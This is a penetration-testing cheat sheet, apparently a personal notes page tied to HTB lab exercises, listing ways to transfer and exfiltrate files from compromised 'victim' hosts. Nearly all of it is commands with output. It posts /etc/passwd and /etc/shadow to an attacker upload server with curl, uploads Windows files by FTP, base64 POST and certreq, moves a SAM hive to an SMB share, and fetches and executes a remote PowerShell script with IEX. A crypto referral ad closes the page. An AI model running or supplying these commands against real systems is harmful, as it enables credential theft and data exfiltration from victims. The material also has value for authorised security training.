# Download - Exfiltration ## Tool Updog ``` updog --ssl --port 9090 --password "exegol4thewin" --directory /opt/resources ``` ## Living Off Trusted Sites {% embed url="" %} ## Web transfer ### **Create a Web Server on Linux victim host** #### Python 3 ```shell-session python3 -m http.server 8000 ``` #### Python 2.7 ```shell-session python2.7 -m SimpleHTTPServer ``` #### PHP ```shell-session php -S 0.0.0.0:8000 ``` #### Ruby ```shell-session ruby -run -ehttpd . -p8000 ``` ### Create a web server on a Windows host #### Windows - HFS HTTP File Server {% embed url="" %} #### Powershell\_HttpServer {% embed url="" %} ### Download file ```shell-session wget 192.168.49.128:8000/filetotransfer.txt ``` ## SCP {% embed url="" %} ```shell-session scp /etc/passwd htb-student@10.129.86.90:/home/htb-student/ ``` ``` scp remote_username@10.10.0.2:/remote/file.txt /local/directory ``` ## Base64 ### **Windows** #### **Transfer from victim host to attack** ```powershell-session PS C:\htb> [Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte)) IyBDb3B5cmlnaHQgKGMpIDE5OTMtMjAwOSBNaWNyb3NvZnQgQ29ycC4NCiMNCiMgVGhpcyBpcyBhIHNhbX ... ``` ```shell-session echo IyBDb3B5cmlnaHQgKGMpIDE5OTMtMjAwOSBNaWNyb3NvZnQgQ29ycC4NCiMNCiMgVGhpcyBpcyBhIHNhbXB... SNIP ... gICAgbG9jYWxob3N0DQo= | base64 -d > host ``` ## SMB ``` $ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/ Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed ``` ``` C:\> move sam.save \\10.10.15.16\CompData 1 file(s) moved. ``` ### Metasploit - Download {% content-ref url="../tools/metasploit" %} [metasploit](https://0xss0rz.gitbook.io/0xss0rz/pentest/tools/metasploit) {% endcontent-ref %} ### SMBclient - get {% content-ref url="../protocols/smb-445-139-rpc" %} [smb-445-139-rpc](https://0xss0rz.gitbook.io/0xss0rz/pentest/protocols/smb-445-139-rpc) {% endcontent-ref %} `smb: \> get prep-prod.txt` Source: {% embed url="" %} ### SMBmap - download {% content-ref url="../protocols/smb-445-139-rpc" %} [smb-445-139-rpc](https://0xss0rz.gitbook.io/0xss0rz/pentest/protocols/smb-445-139-rpc) {% endcontent-ref %} ```shell-session $ smbmap -H 10.129.14.128 --download "notes\note.txt" [+] Starting download: notes\note.txt (116 bytes) [+] File output to: /htb/10.129.14.128-notes_note.txt ``` ### SMB over WebDAV #### From Windows to Linux ```shell-session $ sudo pip3 install wsgidav cheroot ``` ```shell-session $ sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous [sudo] password for plaintext: Running without configuration file. 10:02:53.949 - WARNING : App wsgidav.mw.cors.Cors(None).is_disabled() returned True: skipping. 10:02:53.950 - INFO : WsgiDAV/4.0.1 Python/3.9.2 Linux-5.15.0-15parrot1-amd64-x86_64-with-glibc2.31 10:02:53.950 - INFO : Lock manager: LockManager(LockStorageDict) 10:02:53.950 - INFO : Property manager: None 10:02:53.950 - INFO : Domain controller: SimpleDomainController() 10:02:53.950 - INFO : Registered DAV providers by route: 10:02:53.950 - INFO : - '/:dir_browser': FilesystemProvider for path '/usr/local/lib/python3.9/dist-packages/wsgidav/dir_browser/htdocs' (Read-Only) (anonymous) 10:02:53.950 - INFO : - '/': FilesystemProvider for path '/tmp' (Read-Write) (anonymous) 10:02:53.950 - WARNING : Basic authentication is enabled: It is highly recommended to enable SSL. 10:02:53.950 - WARNING : Share '/' will allow anonymous write access. 10:02:53.950 - WARNING : Share '/:dir_browser' will allow anonymous read access. 10:02:54.194 - INFO : Running WsgiDAV/4.0.1 Cheroot/8.6.0 Python 3.9.2 10:02:54.194 - INFO : Serving on http://0.0.0.0:80 ... ``` ```cmd-session C:\htb> dir \\192.168.49.128\DavWWWRoot Volume in drive \\192.168.49.128\DavWWWRoot has no label. Volume Serial Number is 0000-0000 Directory of \\192.168.49.128\DavWWWRoot 05/18/2022 10:05 AM . 05/18/2022 10:05 AM .. 05/18/2022 10:05 AM sharefolder 05/18/2022 10:05 AM 13 filetest.txt 1 File(s) 13 bytes 3 Dir(s) 43,443,318,784 bytes free ``` ```cmd-session C:\htb> copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\ C:\htb> copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\ ``` ## FTP ### From Windows victim to Linux ```shell-session 0xss0rz@htb[/htb]$ sudo python3 -m pyftpdlib --port 21 --write /usr/local/lib/python3.9/dist-packages/pyftpdlib/authorizers.py:243: RuntimeWarning: write permissions assigned to anonymous user. warnings.warn("write permissions assigned to anonymous user.", [I 2022-05-18 10:33:31] concurrency model: async [I 2022-05-18 10:33:31] masquerade (NAT) address: None [I 2022-05-18 10:33:31] passive ports: None [I 2022-05-18 10:33:31] >>> starting FTP server on 0.0.0.0:21, pid=5155 <<< ``` ```powershell-session PS C:\htb> (New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts') ``` or ```cmd-session C:\htb> echo open 192.168.49.128 > ftpcommand.txt C:\htb> echo USER anonymous >> ftpcommand.txt C:\htb> echo binary >> ftpcommand.txt C:\htb> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt C:\htb> echo bye >> ftpcommand.txt C:\htb> ftp -v -n -s:ftpcommand.txt ftp> open 192.168.49.128 Log in with USER and PASS first. ftp> USER anonymous ftp> PUT c:\windows\system32\drivers\etc\hosts ftp> bye ``` ## Web exfiltration ### Uploadserver #### Linux to Linux {% embed url="" %} ```shell-session $ sudo python3 -m pip install --user uploadserver Collecting uploadserver Using cached uploadserver-2.0.1-py3-none-any.whl (6.9 kB) Installing collected packages: uploadserver Successfully installed uploadserver-2.0.1 ``` ```shell-session # Create a Self-Signed Certificate $ openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' Generating a RSA private key ................................................................................+++++ .......+++++ writing new private key to 'server.pem' ----- ``` ```shell-session $ mkdir https && cd https ``` ```shell-session $ sudo python3 -m uploadserver 443 --server-certificate ~/server.pem ``` ```shell-session ## Uplad multiple files $ curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure ``` #### Windows victim to Linux {% embed url="" %} ```shell-session pip3 install uploadserver ``` ```shell-session $ python3 -m uploadserver File upload available at /upload Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... ``` HTTPS => Create Self-Signed Certificate - See [Web exfiltration - Linux to Linux](#linux-to-linux) {% embed url="" %} ```powershell-session PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1') PS C:\htb> Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts [+] File Uploaded: C:\Windows\System32\drivers\etc\hosts [+] FileHash: 5E7241D66FD77E9E8EA866B6278B2373 ``` ### PowerShell Base64 Web Upload ```powershell-session PS C:\htb> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte)) PS C:\htb> Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64 ``` ```shell-session $ nc -lvnp 8000 listening on [any] 8000 ... connect to [192.168.49.128] from (UNKNOWN) [192.168.49.129] 50923 POST / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Content-Type: application/x-www-form-urlencoded Host: 192.168.49.128:8000 Content-Length: 1820 Connection: Keep-Alive IyBDb3B5cmlnaHQgKGMpIDE5OTMtMjAwOSBNaWNyb3NvZnQgQ29ycC4NCiMNCiMgVGhpcyBpcyBhIHNhbXBsZSBIT1NUUyBmaWxlIHVzZWQgYnkgTWljcm9zb2Z0IFRDUC9JUCBmb3IgV2luZG93cy4NCiMNCiMgVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBtYXBwaW5ncyBvZiBJUCBhZGRyZXNzZXMgdG8gaG9zdCBuYW1lcy4gRWFjaA0KIyBlbnRyeSBzaG91bGQgYmUga2VwdCBvbiBhbiBpbmRpdmlkdWFsIGxpbmUuIFRoZSBJUCBhZGRyZXNzIHNob3VsZA0KIyBiZSBwbGFjZWQgaW4gdGhlIGZpcnN0IGNvbHVtbiBmb2xsb3dlZCBieSB0aGUgY29ycmVzcG9uZGluZyBob3N0IG5hbWUuDQojIFRoZSBJUCBhZGRyZXNzIGFuZCB0aGUgaG9zdCBuYW1lIHNob3VsZCBiZSBzZXBhcmF0ZWQgYnkgYXQgbGVhc3Qgb25lDQo ...SNIP... ``` ```shell-session echo | base64 -d -w 0 > hosts ``` ### Python {% embed url="" %} ``` sudo python3 -m pip install --user uploadserver ``` ```shell-session $ python3 -m uploadserver File upload available at /upload Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... ``` ```shell-session python3 -c 'import requests;requests.post("http://192.168.49.128:8000/upload",files={"files":open("/etc/passwd","rb")})' ``` ## Netcat nc.exe {% embed url="" %} Commands {% embed url="" %} ## WinRM ```powershell-session PS C:\htb> Test-NetConnection -ComputerName DATABASE01 -Port 5985 ComputerName : DATABASE01 RemoteAddress : 192.168.1.101 RemotePort : 5985 InterfaceAlias : Ethernet0 SourceAddress : 192.168.1.100 TcpTestSucceeded : True ``` ```powershell-session PS C:\htb> $Session = New-PSSession -ComputerName DATABASE01 ``` ```powershell-session PS C:\htb> Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session ``` ## RDP ### rdesktop ```shell-session rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files' ``` ### xfreerdp ``` xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer ``` ### Remmina {% embed url="" %} ### Windows to windows {% embed url="" %} ## LOLBAS {% embed url="" %}

### **CertReq.exe** ```cmd-session C:\htb> certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini Certificate Request Processor: The operation timed out 0x80072ee2 (WinHttp: 12002 ERROR_WINHTTP_TIMEOUT) ``` ```shell-session 0xss0rz@htb[/htb]$ sudo nc -lvnp 8000 listening on [any] 8000 ... connect to [192.168.49.128] from (UNKNOWN) [192.168.49.1] 53819 POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/json User-Agent: Mozilla/4.0 (compatible; Win32; NDES client 10.0.19041.1466/vb_release_svc_prod1) Content-Length: 92 Host: 192.168.49.128:8000 ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 ``` ## GTFOBins {% embed url="" %}

## Metasploit {% content-ref url="../tools/metasploit" %} [metasploit](https://0xss0rz.gitbook.io/0xss0rz/pentest/tools/metasploit) {% endcontent-ref %} ``` meterpreter > download c:\\boot.ini [*] downloading: c:\boot.ini -> c:\boot.ini [*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini meterpreter > ``` ## WinRM {% content-ref url="../tools/evil-winrm" %} [evil-winrm](https://0xss0rz.gitbook.io/0xss0rz/pentest/tools/evil-winrm) {% endcontent-ref %} ``` .Evil-WinRM* PS C:\Users\Administrator\Desktop> download 20240308092156_BloodHound.zip ``` ## Resources {% embed url="" %} {% embed url="" %} {% embed url="" %} ## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp) [**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)